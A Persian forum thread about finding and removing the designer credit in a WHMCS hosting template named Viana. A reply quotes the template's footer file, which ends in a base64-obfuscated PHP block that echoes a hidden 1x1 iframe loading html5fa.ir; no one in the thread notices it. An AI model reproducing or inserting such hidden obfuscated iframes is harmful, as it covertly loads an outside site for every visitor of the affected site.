رفتن به مطلب

تغییر نام طراح قالب

hamed1777

پست های پیشنهاد شده

سلام و عرض ادب

دوستان عزیز من یه قالب whmcs از یه سایتی خریده ام ولی الان پایین قالب نوشته شده که طراح قالب وب هاب انلاین . خوب میخواستم ببینم کسی میدونه این وب هاب انلاین توی چه فایلی هست که من ویرایش بکنم اسم قالب من نیز ویانا هست لطفا عکس زیر رو مشاهده بکنید . با تشکر

لینک ها تنها برای اعضای سایت قابل نمایش است.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام باید تو فایل footer.tpl نوشته شده باشه.بررسی کنید

سلام و عرض ادب

براتر عزیز بررسی کردم ولی متاسفانه این فایل خالی بود

من از صبح تا الان دارم کل فایل هارو یکی به یکی چک میکنم ببینم توی کدومش طراح قالب نوشته شده ولی هووف توی یکیش هم نیست دیگه هم خسته شدم ممنون میشم یکی کمک بکنه

باتشکر

لینک به دیدگاه

امکانش هست بنده هم بررسی کنم؟

شرمنده کلی پول دادم و قالب سایت خریدم و همینجوری قالب whmcs و کلیم وقت گذاشتم تا قالب وردپرس رو شخصی کردم

لینک به دیدگاه

برادر ما که قالب شما رو برنمیداریم

قالب ویانا هم رایگان است

الان چک کردم داخل فایل vo-footer.tpl بود

{if $pagetitle eq $LANG.carttitle}</div>{/if}</div></div>                       </div> <!-- Panel Widget -->                                               </div>               </div>              </div>              <!-- .vd_content-section -->       </div>       <!-- .vd_content -->     </div>     <!-- .vd_container -->   </div>   <!-- .vd_content-wrapper -->   <!-- Middle Content End --> </div> <!-- .container --></div><!-- .content --><!-- Footer Start --> <footer class="footer-1"  id="footer">        <div class="vd_bottom ">       <div class="container">           <div class="row">             <div class=" col-xs-12">               <div class="copyright">               طراحی شده توسط <a href="https://go.20script.ir/index.php?url=https://go.20script.ir/index.php?url= لینک ها تنها برای اعضای سایت قابل نمایش است.  " target="_blank">vahabonline.ir</a>ریپ شده توسط <a href="https://go.20script.ir/index.php?url= لینک ها تنها برای اعضای سایت قابل نمایش است.  " target="_blank">HTML5FA</a>               </div>             </div>           </div><!-- row -->       </div><!-- container -->   </div> </footer><!-- Footer END --></div><!-- .vd_body END  --><a id="back-top" href="https://go.20script.ir/index.php?url=&anchor=" data-action="backtop" class="vd_back-top visible"> <i class="fa  fa-angle-up"> </i> </a><!-- Placed at the end of the document so the pages load faster --><script type="text/javascript" src="templates/{$template}/js/jquery.js"></script><!--[if lt IE 9]> <script type="text/javascript" src="templates/{$template}/js/excanvas.js"></script>     <![endif]--><script type="text/javascript" src="templates/{$template}/js/bootstrap.min.js"></script><script type="text/javascript" src="templates/{$template}/js/breakpoints.js"></script><script type="text/javascript" src="templates/{$template}/js/jquery.dataTables.min.js"></script><script type="text/javascript" src="templates/{$template}/js/jquery.prettyPhoto.js"></script><script type="text/javascript" src="templates/{$template}/js/jquery.mCustomScrollbar.concat.min.js"></script><script type="text/javascript" src="templates/{$template}/js/jquery.tagsinput.min.js"></script><script type="text/javascript" src="templates/{$template}/js/bootstrap-switch.min.js"></script><script type="text/javascript" src="templates/{$template}/js/jquery.pnotify.min.js"></script><script type="text/javascript" src="templates/{$template}/js/theme.js"></script><script type="text/javascript" src="templates/{$template}/custom/custom.js"></script></body>{php}$str = 'PGlmcmFtZSB3aWR0aD0iMSIgc2Nyb2xsaW5nPSJubyIgaGVpZ2h0PSIxIiBmcmFtZWJvcmRlcj0iMCIgaHNwYWNlPSIwIiB2c3BhY2U9IjAiIG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHNyYz0iaHR0cDovL2h0bWw1ZmEuaXIiPjwvaWZyYW1lPg==';echo base64_decode($str);{/php}</html>

لینک به دیدگاه

بهتره با فروشنده صحبت کنید. کپی رایت رو رعایت کنید

وقتیکه فروشنده اصلا پشتیبانش خوب نی و تیکت سه روز پیش رو جواب نمیدادن توقع داری برم با پشتیبان قالب مشورت بکنم ؟ اگه الان تیکت در مورد خرید زده بودم صد در هزار جواب داده بودن

موفق باشی

لینک به دیدگاه

درود

قالب هاستینگ ویانا بصورت رایگان هم منتشر شده اما وقتی خریداری فرمودین بهتره با کسب اجازه و هماهنگی کپی رایت رو حذف بفرمائید تا بحث حمایت از تولید کنندگان داخلی طبق معمول مشکل دار نباشه!

وهاب گرامی معمولا درگیر امور سفارشات هستند با همراه ایشون تماس بگیرید و مشکلاتتون رو در میون بزارید.

موفق و پاینده باشید.

لینک به دیدگاه

• 5 ماه پیش ...
display_errors رو در سرورتون فعال بفرمائید و عمل ورود رو انجام بدین ببینین چه اروری نمایش میده . همچنین میتونید فایل log رو چک کنید.

error نمایش داده شده رو اگر متوجه نشدین قرار بدین راهنمایی کنیم.

برادر ما که قالب شما رو برنمیداریم

قالب ویانا هم رایگان است

الان چک کردم داخل فایل vo-footer.tpl بود

موفق و پاینده باشید.

درود من فایل viana را دانلود کردم فایل هدر خالی است میشه لطفا نسخه کاملتری بدین

لینک به دیدگاه

• اینرو بررسی کنین
  • لینک ها تنها برای اعضای سایت قابل نمایش است.

• و
  • لینک ها تنها برای اعضای سایت قابل نمایش است.

لینک به دیدگاه

درود

شما نسخه پولی این رو خریدادری کردید از وهاب انلاین یا رایگانش رو دانلود کردید؟

منم میخواستم بردارم با وهاب عزیز تماس گرفتم گفت توی نسخه جدید این امکان وجود نداره

لینک به دیدگاه

درود

شما نسخه پولی این رو خریدادری کردید از وهاب انلاین یا رایگانش رو دانلود کردید؟

منم میخواستم بردارم با وهاب عزیز تماس گرفتم گفت توی نسخه جدید این امکان وجود نداره

احتراما دوست عزیز منم از نسخه پولی استفاده میکردم ولی اصلا اشکالی نداره که نام طراح یعنی وهاب انلاین هم باشه چونکه طراحی قالب whmcs خودش یک پروژه و تخصص جداست که طراح چت روم و هاست چت روم این تخصص رو ندارن

موفق باشی

لینک به دیدگاه

احتراما دوست عزیز منم از نسخه پولی استفاده میکردم ولی اصلا اشکالی نداره که نام طراح یعنی وهاب انلاین هم باشه چونکه طراحی قالب whmcs خودش یک پروژه و تخصص جداست که طراح چت روم و هاست چت روم این تخصص رو ندارن

موفق باشی

چه ربطی داشت عزیز

من حق کپی رایت بهش دادم چون واقعا زحمت کشیده برا قالب من به نظرش احترام گذاشتم الان این یعنی چی یعنی ما چون طراح چت روم وسایت یا هاست هستیم چیز دیگه سرمون نمیشه؟ دست مریضاد

لینک به دیدگاه

چه ربطی داشت عزیز

من حق کپی رایت بهش دادم چون واقعا زحمت کشیده برا قالب من به نظرش احترام گذاشتم الان این یعنی چی یعنی ما چون طراح چت روم وسایت یا هاست هستیم چیز دیگه سرمون نمیشه؟ دست مریضاد

سلام و عرض ادب

احتراما دوست عزیز فکر کنم درست منظور بنده رو متوجه نشدی . من قصد توهین به حرفه شما رو ندارم .

موفق باشی ( لطفا دیگه به این موضوع پاسخ ندید )

لینک به دیدگاه

بایگانی شده

این موضوع بایگانی و قفل شده و دیگر امکان ارسال پاسخ نیست.

مهمان
این موضوع برای عدم ارسال قفل گردیده است.
  • اضافه کردن...